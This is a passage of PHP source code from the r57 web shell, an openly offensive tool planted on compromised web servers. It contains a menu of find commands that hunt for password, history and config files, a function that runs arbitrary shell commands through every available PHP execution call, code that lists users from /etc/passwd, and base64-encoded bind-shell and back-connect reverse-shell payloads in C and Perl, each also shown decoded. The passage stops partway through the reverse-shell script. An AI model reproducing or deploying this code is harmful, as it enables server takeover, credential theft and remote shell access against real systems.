'find sgid files in current dir >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find . -type f -perm -02000 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',

2245
2246
'find all writable files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -perm -2 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',

2247
2248
'find all writable files in current dir >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find . -type f -perm -2 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',

2249
2250
'find all writable directories >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find /  -type d -perm -2 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',

2251
2252
'find all writable directories in current dir >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find . -type d -perm -2 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',

2253
2254
'find all writable directories and files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -perm -2 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',

2255
2256
'find all writable directories and files in current dir >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find . -perm -2 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',

2257
2258
'find all .htpasswd files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name .htpasswd  >> /tmp/grep.txt;cat /tmp/grep.txt',

2259
2260
'find all .bash_history files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name .bash_history  >> /tmp/grep.txt;cat /tmp/grep.txt',

2261
2262
'find all .mysql_history files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name .mysql_history  >> /tmp/grep.txt;cat /tmp/grep.txt',

2263
2264
'find all .fetchmailrc files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name .fetchmailrc  >> /tmp/grep.txt;cat /tmp/grep.txt',

2265
2266
'find httpd.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name httpd.conf >> /tmp/grep.txt;cat /tmp/grep.txt',

2267
2268
'find vhosts.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name vhosts.conf >> /tmp/grep.txt;cat /tmp/grep.txt',

2269
2270
'find proftpd.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name proftpd.conf >> /tmp/grep.txt;cat /tmp/grep.txt',

2271
2272
'find admin.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name admin.php >> /tmp/grep.txt;cat /tmp/grep.txt',

2273
2274
'find config* files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name "config*"  >> /tmp/grep.txt;cat /tmp/grep.txt',

2275
2276
'find cfg.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name cfg.php >> /tmp/grep.txt;cat /tmp/grep.txt',

2277
2278
'find conf.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name conf.php >> /tmp/grep.txt;cat /tmp/grep.txt',

2279
2280
'find config.dat files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name config.dat >> /tmp/grep.txt;cat /tmp/grep.txt',

2281
2282
'find config.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name config.php >> /tmp/grep.txt;cat /tmp/grep.txt',

2283
2284
'find config.inc files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name config.inc >> /tmp/grep.txt;cat /tmp/grep.txt',

2285
2286
'find config.inc.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name config.inc.php >> /tmp/grep.txt;cat /tmp/grep.txt',

2287
2288
'find config.default.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name config.default.php >> /tmp/grep.txt;cat /tmp/grep.txt',

2289
2290
'find *.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name "*.conf" >> /tmp/grep.txt;cat /tmp/grep.txt',

2291
2292
'find *.pwd files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name "*.pwd" >> /tmp/grep.txt;cat /tmp/grep.txt',

2293
2294
'find *.sql files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name "*.sql" >> /tmp/grep.txt;cat /tmp/grep.txt',

2295
2296
'find *backup* files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name "*backup*" >> /tmp/grep.txt;cat /tmp/grep.txt',

2297
2298
'find *dump* files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name "*dump*" >> /tmp/grep.txt;cat /tmp/grep.txt',

2299
2300
'-----------------------------------'=>'',

2301
2302
'find /var/ access_log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find /var/ -type f -name access_log >> /tmp/grep.txt;cat /tmp/grep.txt',

2303
2304
'find /var/ error_log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find /var/ -type f -name error_log >> /tmp/grep.txt;cat /tmp/grep.txt',

2305
2306
'find /var/ access.log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find /var/ -type f -name access.log >> /tmp/grep.txt;cat /tmp/grep.txt',

2307
2308
'find /var/ error.log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find /var/ -type f -name error.log >> /tmp/grep.txt;cat /tmp/grep.txt',

2309
2310
'find /var/ "*.log" files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find /var/ -type f -name "*.log" >> /tmp/grep.txt;cat /tmp/grep.txt',

2311
2312
'----------------------------------------------------------------------------------------------------'=>'ls -la'

2313
2314
);

2315
2316
$table_up1  = "<tr><td bgcolor=#333333><font face=Verdana size=-2><b><div align=center>:: ";

2317
2318
$table_up2  = " ::</div></b></font></td></tr><tr><td>";

2319
2320
$table_up3  = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333>";

2321
2322
$table_end1 = "</td></tr>";

2323
2324
$arrow = " <font face=Webdings color=gray>4</font>";

2325
2326
$lb = "<font color=green>[</font>";

2327
2328
$rb = "<font color=green>]</font>";

2329
2330
$font = "<font face=Verdana size=-2>";

2331
2332
$ts = "<table class=table1 width=100% align=center>";

2333
2334
$te = "</table>";

2335
2336
$fs = "<form name=form method=POST>";

2337
2338
$fe = "</form>";

2339
2340
if(isset($_GET['users'])) 

2341
2342
{

2343
2344
if(!$users=get_users('/etc/passwd')) {echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>";}

2345
2346
else 

2347
2348
{

2349
2350
echo '<center>';

2351
2352
foreach($users as $user) {echo $user."<br>";}

2353
2354
echo '</center>';

2355
2356
}

2357
2358
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";die();

2359
2360
}

2361
2362
if (!empty($_POST['dir'])) {if(@function_exists('chdir')){@chdir($_POST['dir']);}else if(@function_exists('chroot')){@chroot($_POST['dir']);};}

2363
2364
if (empty($_POST['dir'])){if(@function_exists('chdir')){$dir = @getcwd();};}else{$dir=$_POST['dir'];}

2365
2366
$unix = 0;

2367
2368
if(strlen($dir)>1 &&$dir[1]==":") $unix=0;else $unix=1;

2369
2370
if(empty($dir))

2371
2372
{

2373
2374
$os = getenv('OS');

2375
2376
if(empty($os)){$os = @php_uname();}

2377
2378
if(empty($os)){$os ="-";$unix=1;}

2379
2380
else

2381
2382
{

2383
2384
if(@eregi("^win",$os)) {$unix = 0;}

2385
2386
else {$unix = 1;}

2387
2388
}

2389
2390
}

2391
2392
if(!empty($_POST['s_dir']) &&!empty($_POST['s_text']) &&!empty($_POST['cmd']) &&$_POST['cmd'] == "search_text")

2393
2394
{

2395
2396
echo $head;

2397
2398
if(!empty($_POST['s_mask']) &&!empty($_POST['m'])) {$sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']);}

2399
2400
else {$sr = new SearchResult($_POST['s_dir'],$_POST['s_text']);}

2401
2402
$sr->SearchText(0,0);

2403
2404
$res = $sr->GetResultFiles();

2405
2406
$found = $sr->GetMatchesCount();

2407
2408
$titles = $sr->GetTitles();

2409
2410
$r = "";

2411
2412
if($found >0)

2413
2414
{

2415
2416
$r .= "<TABLE width=100%>";

2417
2418
foreach($res as $file=>$v)

2419
2420
{

2421
2422
$r .= "<TR>";

2423
2424
$r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);

2425
2426
$r .= (!$unix)?str_replace("/","\\",$file) : $file;

2427
2428
$r .= "</b></font></ TD>";

2429
2430
$r .= "</TR>";

2431
2432
foreach($v as $a=>$b)

2433
2434
{

2435
2436
$r .= "<TR>";

2437
2438
$r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";

2439
2440
$r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";

2441
2442
$r .= "</TR>\n";

2443
2444
}

2445
2446
}

2447
2448
$r .= "</TABLE>";

2449
2450
echo $r;

2451
2452
}

2453
2454
else

2455
2456
{

2457
2458
echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";

2459
2460
}

2461
2462
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";

2463
2464
die();

2465
2466
}

2467
2468
if(!$safe_mode &&strpos(ex("echo abcr57"),"r57")!=3) {$safe_mode = 1;}

2469
2470
$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');

2471
2472
if(empty($SERVER_SOFTWARE)){$SERVER_SOFTWARE = "-";}

2473
2474
function ws($i)

2475
2476
{

2477
2478
return @str_repeat("&nbsp;",$i);

2479
2480
}

2481
2482
function ex($cfe)

2483
2484
{

2485
2486
$res = '';

2487
2488
if (!empty($cfe))

2489
2490
{

2491
2492
if(@function_exists('exec'))

2493
2494
{

2495
2496
@exec($cfe,$res);

2497
2498
$res = join("\n",$res);

2499
2500
}

2501
2502
elseif(@function_exists('shell_exec'))

2503
2504
{

2505
2506
$res = @shell_exec($cfe);

2507
2508
}

2509
2510
elseif(@function_exists('system'))

2511
2512
{

2513
2514
@ob_start();

2515
2516
@system($cfe);

2517
2518
$res = @ob_get_contents();

2519
2520
@ob_end_clean();

2521
2522
}

2523
2524
elseif(@function_exists('passthru'))

2525
2526
{

2527
2528
@ob_start();

2529
2530
@passthru($cfe);

2531
2532
$res = @ob_get_contents();

2533
2534
@ob_end_clean();

2535
2536
}

2537
2538
elseif(@is_resource($f = @popen($cfe,"r")))

2539
2540
{

2541
2542
$res = "";

2543
2544
if(@function_exists('fread') &&@function_exists('feof')){

2545
2546
while(!@feof($f)) {$res .= @fread($f,1024);}

2547
2548
}else if(@function_exists('fgets') &&@function_exists('feof')){

2549
2550
while(!@feof($f)) {$res .= @fgets($f,1024);}

2551
2552
}

2553
2554
@pclose($f);

2555
2556
}

2557
2558
elseif(@is_resource($f = @proc_open($cfe,array(1 =>array("pipe","w")),$pipes)))

2559
2560
{

2561
2562
$res = "";

2563
2564
if(@function_exists('fread') &&@function_exists('feof')){

2565
2566
while(!@feof($pipes[1])) {$res .= @fread($pipes[1],1024);}

2567
2568
}else if(@function_exists('fgets') &&@function_exists('feof')){

2569
2570
while(!@feof($pipes[1])) {$res .= @fgets($pipes[1],1024);}

2571
2572
}

2573
2574
@proc_close($f);

2575
2576
}

2577
2578
elseif(@function_exists('pcntl_exec')&&@function_exists('pcntl_fork'))

2579
2580
{

2581
2582
$res = '[~] Blind Command Execution via [pcntl_exec]\n\n';

2583
2584
$pid = @pcntl_fork();

2585
2586
if ($pid == -1) {

2587
2588
$res .= '[-] Could not children fork. Exit';

2589
2590
}else if ($pid) {

2591
2592
if (@pcntl_wifexited($status)){$res .= '[+] Done! Command "'.$cfe.'" successfully executed.';}

2593
2594
else {$res .= '[-] Error. Command incorrect.';}

2595
2596
}else {

2597
2598
$cfe = array(" -e 'system(\"$cfe\")'");

2599
2600
if(@pcntl_exec('/usr/bin/perl',$cfe)) exit(0);

2601
2602
if(@pcntl_exec('/usr/local/bin/perl',$cfe)) exit(0);

2603
2604
die();

2605
2606
}

2607
2608
}

2609
2610
}

2611
2612
return $res;

2613
2614
}

2615
2616
function get_users($filename)

2617
2618
{

2619
2620
$users = array();

2621
2622
$rows=@explode("\n",readzlib($filename));

2623
2624
if(!$rows) return 0;

2625
2626
foreach ($rows as $string)

2627
2628
{

2629
2630
$user = @explode(":",trim($string));

2631
2632
if(substr($string,0,1)!='#') array_push($users,$user[0]);

2633
2634
}

2635
2636
return $users;

2637
2638
}

2639
2640
function err($n,$txt='')

2641
2642
{

2643
2644
echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#333333><font color=red face=Verdana size=-2><div align=center><b>';

2645
2646
echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n];

2647
2648
if(!empty($txt)) {echo " $txt";}

2649
2650
echo '</b></div></font></td></tr></table>';

2651
2652
return null;

2653
2654
}

2655
2656
function perms($mode)

2657
2658
{

2659
2660
if (!$GLOBALS['unix']) return 0;

2661
2662
if( $mode &0x1000 ) {$type='p';}

2663
2664
else if( $mode &0x2000 ) {$type='c';}

2665
2666
else if( $mode &0x4000 ) {$type='d';}

2667
2668
else if( $mode &0x6000 ) {$type='b';}

2669
2670
else if( $mode &0x8000 ) {$type='-';}

2671
2672
else if( $mode &0xA000 ) {$type='l';}

2673
2674
else if( $mode &0xC000 ) {$type='s';}

2675
2676
else $type='u';

2677
2678
$owner["read"] = ($mode &00400) ?'r': '-';

2679
2680
$owner["write"] = ($mode &00200) ?'w': '-';

2681
2682
$owner["execute"] = ($mode &00100) ?'x': '-';

2683
2684
$group["read"] = ($mode &00040) ?'r': '-';

2685
2686
$group["write"] = ($mode &00020) ?'w': '-';

2687
2688
$group["execute"] = ($mode &00010) ?'x': '-';

2689
2690
$world["read"] = ($mode &00004) ?'r': '-';

2691
2692
$world["write"] = ($mode &00002) ?'w': '-';

2693
2694
$world["execute"] = ($mode &00001) ?'x': '-';

2695
2696
if( $mode &0x800 ) $owner["execute"] = ($owner['execute']=='x') ?'s': 'S';

2697
2698
if( $mode &0x400 ) $group["execute"] = ($group['execute']=='x') ?'s': 'S';

2699
2700
if( $mode &0x200 ) $world["execute"] = ($world['execute']=='x') ?'t': 'T';

2701
2702
$s=sprintf("%1s",$type);

2703
2704
$s.=sprintf("%1s%1s%1s",$owner['read'],$owner['write'],$owner['execute']);

2705
2706
$s.=sprintf("%1s%1s%1s",$group['read'],$group['write'],$group['execute']);

2707
2708
$s.=sprintf("%1s%1s%1s",$world['read'],$world['write'],$world['execute']);

2709
2710
return trim($s);

2711
2712
}

2713
2714
function in($type,$name,$size,$value,$checked=0)

2715
2716
{

2717
2718
$ret = "<input type=".$type." name=".$name." ";

2719
2720
if($size != 0) {$ret .= "size=".$size." ";}

2721
2722
$ret .= "value=\"".$value."\"";

2723
2724
if($checked) $ret .= " checked";

2725
2726
return $ret.">";

2727
2728
}

2729
2730
function which($pr)

2731
2732
{

2733
2734
$path = '';

2735
2736
$path = ex("which $pr");

2737
2738
if(!empty($path)) {return $path;}else {return false;}

2739
2740
}

2741
2742
function cf($fname,$text)

2743
2744
{

2745
2746
$w_file=@fopen($fname,"w") or @function_exists('file_put_contents') or err(0);

2747
2748
if($w_file)

2749
2750
{

2751
2752
@fwrite($w_file,@base64_decode($text)) or @fputs($w_file,@base64_decode($text)) or @file_put_contents($fname,@base64_decode($text));

2753
2754
@fclose($w_file);

2755
2756
}

2757
2758
}

2759
2760
function sr($l,$t1,$t2)

2761
2762
{

2763
2764
return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";

2765
2766
}

2767
2768
if (!@function_exists("view_size"))

2769
2770
{

2771
2772
function view_size($size)

2773
2774
{

2775
2776
if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 ." GB";}

2777
2778
elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 ." MB";}

2779
2780
elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 ." KB";}

2781
2782
else {$size = $size ." B";}

2783
2784
return $size;

2785
2786
}

2787
2788
}

2789
2790
function DirFilesR($dir,$types='')

2791
2792
{

2793
2794
$files = Array();

2795
2796
if(($handle = @opendir($dir)) ||(@function_exists('scandir')))

2797
2798
{

2799
2800
while ((false !== ($file = @readdir($handle))) &&(false !== ($file = @scandir($dir))))

2801
2802
{

2803
2804
if ($file != "."&&$file != "..")

2805
2806
{

2807
2808
if(@is_dir($dir."/".$file))

2809
2810
$files = @array_merge($files,DirFilesR($dir."/".$file,$types));

2811
2812
else

2813
2814
{

2815
2816
$pos = @strrpos($file,".");

2817
2818
$ext = @substr($file,$pos,@strlen($file)-$pos);

2819
2820
if($types)

2821
2822
{

2823
2824
if(@in_array($ext,explode(';',$types)))

2825
2826
$files[] = $dir."/".$file;

2827
2828
}

2829
2830
else

2831
2832
$files[] = $dir."/".$file;

2833
2834
}

2835
2836
}

2837
2838
}

2839
2840
@closedir($handle);

2841
2842
}

2843
2844
return $files;

2845
2846
}

2847
2848
class SearchResult

2849
2850
{

2851
2852
var $text;

2853
2854
var $FilesToSearch;

2855
2856
var $ResultFiles;

2857
2858
var $FilesTotal;

2859
2860
var $MatchesCount;

2861
2862
var $FileMatschesCount;

2863
2864
var $TimeStart;

2865
2866
var $TimeTotal;

2867
2868
var $titles;

2869
2870
function SearchResult($dir,$text,$filter='')

2871
2872
{

2873
2874
$dirs = @explode(";",$dir);

2875
2876
$this->FilesToSearch = Array();

2877
2878
for($a=0;$a<count($dirs);$a++)

2879
2880
$this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));

2881
2882
$this->text = $text;

2883
2884
$this->FilesTotal = @count($this->FilesToSearch);

2885
2886
$this->TimeStart = getmicrotime();

2887
2888
$this->MatchesCount = 0;

2889
2890
$this->ResultFiles = Array();

2891
2892
$this->FileMatchesCount = Array();

2893
2894
$this->titles = Array();

2895
2896
}

2897
2898
function GetFilesTotal() {return $this->FilesTotal;}

2899
2900
function GetTitles() {return $this->titles;}

2901
2902
function GetTimeTotal() {return $this->TimeTotal;}

2903
2904
function GetMatchesCount() {return $this->MatchesCount;}

2905
2906
function GetFileMatchesCount() {return $this->FileMatchesCount;}

2907
2908
function GetResultFiles() {return $this->ResultFiles;}

2909
2910
function SearchText($phrase=0,$case=0) {

2911
2912
$qq = @explode(' ',$this->text);

2913
2914
$delim = '|';

2915
2916
if($phrase)

2917
2918
foreach($qq as $k=>$v)

2919
2920
$qq[$k] = '\b'.$v.'\b';

2921
2922
$words = '('.@implode($delim,$qq).')';

2923
2924
$pattern = "/".$words."/";

2925
2926
if(!$case)

2927
2928
$pattern .= 'i';

2929
2930
foreach($this->FilesToSearch as $k=>$filename)

2931
2932
{

2933
2934
$this->FileMatchesCount[$filename] = 0;

2935
2936
$FileStrings = @file($filename) or @next;

2937
2938
for($a=0;$a<@count($FileStrings);$a++)

2939
2940
{

2941
2942
$count = 0;

2943
2944
$CurString = $FileStrings[$a];

2945
2946
$CurString = @Trim($CurString);

2947
2948
$CurString = @strip_tags($CurString);

2949
2950
$aa = '';

2951
2952
if(($count = @preg_match_all($pattern,$CurString,$aa)))

2953
2954
{

2955
2956
$CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);

2957
2958
$this->ResultFiles[$filename][$a+1] = $CurString;

2959
2960
$this->MatchesCount += $count;

2961
2962
$this->FileMatchesCount[$filename] += $count;

2963
2964
}

2965
2966
}

2967
2968
}

2969
2970
$this->TimeTotal = @round(getmicrotime() -$this->TimeStart,4);

2971
2972
}

2973
2974
}

2975
2976
function getmicrotime()

2977
2978
{

2979
2980
list($usec,$sec) = @explode(" ",@microtime());

2981
2982
return ((float)$usec +(float)$sec);

2983
2984
}

2985
2986
$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS

2987
2988
A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I

2989
2990
GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt

2991
2992
b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9

2993
2994
pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF

2995
2996
NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK

2997
2998
ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog

2999
3000
ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk

3001
3002
7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2

3003
3004
9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld

3005
3006
2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu

3007
3008
dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp

3009
3010
lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";

3011
3012
/* ?ST SATIRIN KIRILMI? HAL? */

3013
3014
/*

3015
3016
3017
3018
#include <stdio.h>

3019
3020
#include <string.h>

3021
3022
#include <sys/types.h>

3023
3024
#include <sys/socket.h>

3025
3026
#include <netinet/in.h>

3027
3028
#include <errno.h>

3029
3030
int main(argc,argv)

3031
3032
int argc;

3033
3034
char **argv;

3035
3036
{  

3037
3038
 int sockfd, newfd;

3039
3040
 char buf[30];

3041
3042
 struct sockaddr_in remote;

3043
3044
 if(fork() == 0) { 

3045
3046
 remote.sin_family = AF_INET;

3047
3048
 remote.sin_port = htons(atoi(argv[1]));

3049
3050
 remote.sin_addr.s_addr = htonl(INADDR_ANY); 

3051
3052
 sockfd = socket(AF_INET,SOCK_STREAM,0);

3053
3054
 if(!sockfd) perror("socket error");

3055
3056
 bind(sockfd, (struct sockaddr *)&remote, 0x10);

3057
3058
 listen(sockfd, 5);

3059
3060
 while(1)

3061
3062
  {

3063
3064
   newfd=accept(sockfd,0,0);

3065
3066
   dup2(newfd,0);

3067
3068
   dup2(newfd,1);

3069
3070
   dup2(newfd,2);

3071
3072
   write(newfd,"Password:",10);

3073
3074
   read(newfd,buf,sizeof(buf));

3075
3076
   if (!chpass(argv[2],buf))

3077
3078
   system("echo welcome to r57 shell && /bin/bash -i");

3079
3080
   else

3081
3082
   fprintf(stderr,"Sorry");

3083
3084
   close(newfd);

3085
3086
  }

3087
3088
 }

3089
3090
}

3091
3092
int chpass(char *base, char *entered) {

3093
3094
int i;

3095
3096
for(i=0;i<strlen(entered);i++) 

3097
3098
{

3099
3100
if(entered[i] == '\n')

3101
3102
entered[i] = '\0'; 

3103
3104
if(entered[i] == '\r')

3105
3106
entered[i] = '\0';

3107
3108
}

3109
3110
if (!strcmp(base,entered))

3111
3112
return 0;

3113
3114
}

3115
3116
3117
3118
*/

3119
3120
3121
3122
$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS

3123
3124
VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs

3125
3126
JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV

3127
3128
TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG

3129
3130
lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK

3131
3132
Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i

3133
3134
Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N

3135
3136
lIENPTk47DQpleGl0IDA7DQp9DQp9";

3137
3138
3139
3140
/* ?ST SATIRIN KIRILMI? HAL? */

3141
3142
/*

3143
3144
3145
3146
#!/usr/bin/perl

3147
3148
$SHELL="/bin/bash -i";

3149
3150
if (@ARGV < 1) { exit(1); }

3151
3152
$LISTEN_PORT=$ARGV[0];

3153
3154
use Socket;

3155
3156
$protocol=getprotobyname('tcp');

3157
3158
socket(S,&PF_INET,&SOCK_STREAM,$protocol) || die "Cant create socket\n";

3159
3160
setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);

3161
3162
bind(S,sockaddr_in($LISTEN_PORT,INADDR_ANY)) || die "Cant open port\n";

3163
3164
listen(S,3) || die "Cant listen port\n";

3165
3166
while(1)

3167
3168
{

3169
3170
accept(CONN,S);

3171
3172
if(!($pid=fork))

3173
3174
{

3175
3176
die "Cannot fork" if (!defined $pid);

3177
3178
open STDIN,"<&CONN";

3179
3180
open STDOUT,">&CONN";

3181
3182
open STDERR,">&CONN";

3183
3184
exec $SHELL || die print CONN "Cant execute $SHELL\n";

3185
3186
close CONN;

3187
3188
exit 0;

3189
3190
}

3191
3192
}

3193
3194
3195
3196
*/

3197
3198
3199
3200
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj

3201
3202
aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR

3203
3204
hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT

3205
3206
sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI

3207
3208
kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi

3209
3210
KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl

3211
3212
OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";

3213
3214
3215
3216
/* ?ST SATIRIN KIRILMI? HAL? */

3217
3218
/*

3219
3220
3221
3222
#!/usr/bin/perl

3223
3224
use Socket;

3225
3226
$cmd= "lynx";

3227
3228
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';

3229
3230
$0=$cmd;

3231
3232
$target=$ARGV[0];

3233
3234
$port=$ARGV[1];

3235
3236
$iaddr=inet_aton($target) || die("Error: $!\n");

3237
3238
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");

3239
3240
$proto=getprotobyname('tcp');

3241
3242
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");

3243
3244
